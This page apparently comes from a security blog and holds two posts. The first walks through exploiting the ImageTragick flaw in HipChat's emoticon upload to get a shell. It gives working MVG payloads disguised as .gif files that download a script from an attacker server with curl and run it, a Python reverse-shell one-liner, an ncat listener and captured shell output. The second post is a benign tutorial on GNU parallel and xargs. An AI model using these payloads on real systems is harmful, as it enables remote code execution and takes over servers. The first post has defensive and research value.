Tuesday, May 17, 2016

Exploiting HipChat with ImageTragick

HipChat uses the ImageMagick library to resize custom emoticons. If you can upload your own emoticon image files to the server through the web interface (or probably the API), you can use the ImageTragick vulnerability to get a shell on the machine.

It turns out ImageTragick's PoC didn't work on our server:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

After quite a bit of mangling and testing, the following file contents, saved with a .gif extension (HipChat doesn't accept .mvg files), will work:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";curl testserver:8000/test4")'
pop graphic-context
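
If you want to sanity-check a payload locally before uploading it, running the file through a vulnerable ImageMagick build should fire the injected command (assuming your local convert is an unpatched version with the default policy.xml; ImageMagick sniffs the MVG content, so the .gif extension doesn't get in the way, and "exploit.gif" is just whatever you named the file):
convert exploit.gif out.png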

I could see the request for "test4" in my testserver's logs. Woot. This means we have remote command execution on the server. Now all we have to do is get a shell.
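
Any web server that logs requests works for catching that callback. A quick option on the test box is Python's built-in module (this assumes Python 2 on the test server; run it from the directory you'll serve files out of and it logs each GET to stdout):
python -m SimpleHTTPServer 8000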

Since I didn't have time to figure out how to make it a leet one-liner, I decided to break getting a shell into two requests: the first pulls the shell script down to /tmp/ and the second executes it.

The reverse shell I used was:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I simply pasted that into a .sh file on my testserver so the victim HipChat server could pull it down. (The one-liner connects back to 10.0.0.1:1234, duplicates stdin, stdout, and stderr onto the socket, and spawns /bin/sh.)

I listened on my remote box with a basic ncat listener:
ncat -l -v 1234

Then I created the two separate exploit .gif files. The first .gif runs curl to download the python shell:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";curl testserver:8000/python_shell.sh -o /tmp/python_shell.sh")'
pop graphic-context

The second .gif executes the python shell:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";bash /tmp/python_shell.sh")'
pop graphic-context

(Now that I think about it, you might be able to combine both files into one so you only have to upload once, but I haven't tested that.)
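
If combining them does work, the single file would presumably look something like this (an untested sketch that just chains the download and the execution with another semicolon):
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";curl testserver:8000/python_shell.sh -o /tmp/python_shell.sh;bash /tmp/python_shell.sh")'
pop graphic-context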

Once you upload that second .gif, a second or two later you should see your shell come through on your ncat listener on port 1234:
$ uname -a
Linux hipchat.blah.com 3.4.0-54-generic #81~precise1-Ubuntu SMP Tue Jul 15 04:02:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

So ImageTragick is kind of a big deal in that it's stupid easy to exploit (at least in this case) and it's a fairly reliable command injection vuln.

Thursday, May 12, 2016

Using Parallel Instead of For Loops

For loops are an addiction of mine; I use them all day, every day. Any time I have a tool that does one thing well but doesn't support multiple inputs or inputs from a file, I use a bash for loop. Unfortunately, for loops run sequentially: one process runs, finishes, and exits, then the next process starts, finishes, and exits, and so on.

Many times I've come across a tool or process that just hangs, and as a result everything queued after it never runs. In situations where I think that's likely to happen, I'll use parallel.

OK, so let's make a for loop that resolves the MX records of google.com:

for i in $(host google.com | grep 'mail is' | cut -d ' ' -f7); do printf $i:; host $i | grep 'has address' | cut -d ' ' -f4; done
alt1.aspmx.l.google.com.:74.125.192.27
alt2.aspmx.l.google.com.:74.125.141.27
aspmx.l.google.com.:209.85.147.26
alt4.aspmx.l.google.com.:209.85.203.26
alt3.aspmx.l.google.com.:64.233.190.27

Great, nothing fancy there. Now let's say one iteration of that for loop hangs, and let's pretend we're using a tool (not "host") with ridiculous timeouts (e.g. nikto on default settings). Wouldn't it be great to run several iterations at the same time in groups, so that as one finishes its spot in the group, the next iteration takes its place? Yeah, that's what parallel does. Let's change that for loop to use parallel instead:

host google.com | grep 'mail is' | cut -d ' ' -f7 | parallel -j 5 -I{} -r "printf {}:; host {} | grep 'has address' | cut -d ' ' -f4"
alt2.aspmx.l.google.com.:209.85.202.27
alt3.aspmx.l.google.com.:108.177.15.27
aspmx.l.google.com.:209.85.201.27
alt4.aspmx.l.google.com.:74.125.136.27
alt1.aspmx.l.google.com.:173.194.68.27

This shows you how to send piped bash commands to parallel, instead of just single processes. In this way, it functions very similarly to the classic "while read line" looping structure.
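
For comparison, here's the same job written as a while read loop (a sketch; it's fed from stdin the same way, but like the for loop it still runs one host at a time):
host google.com | grep 'mail is' | cut -d ' ' -f7 | while read line; do printf $line:; host $line | grep 'has address' | cut -d ' ' -f4; done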

BONUS:
The same command using xargs (very similar, and works on both OS X and *nix):
host google.com | grep 'mail is' | cut -d ' ' -f7 | xargs -I {} sh -c "printf {}:; host {} | grep 'has address' | cut -d ' ' -f4"
aspmx.l.google.com.:209.85.232.27
alt3.aspmx.l.google.com.:64.233.167.27
alt2.aspmx.l.google.com.:74.125.24.27
alt1.aspmx.l.google.com.:64.233.186.27
alt4.aspmx.l.google.com.:74.125.136.26
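
If you want the xargs version to run jobs concurrently too, both GNU and BSD xargs support -P to set the number of parallel processes (a sketch mirroring the parallel -j 5 example above; output order will vary):
host google.com | grep 'mail is' | cut -d ' ' -f7 | xargs -P 5 -I {} sh -c "printf {}:; host {} | grep 'has address' | cut -d ' ' -f4"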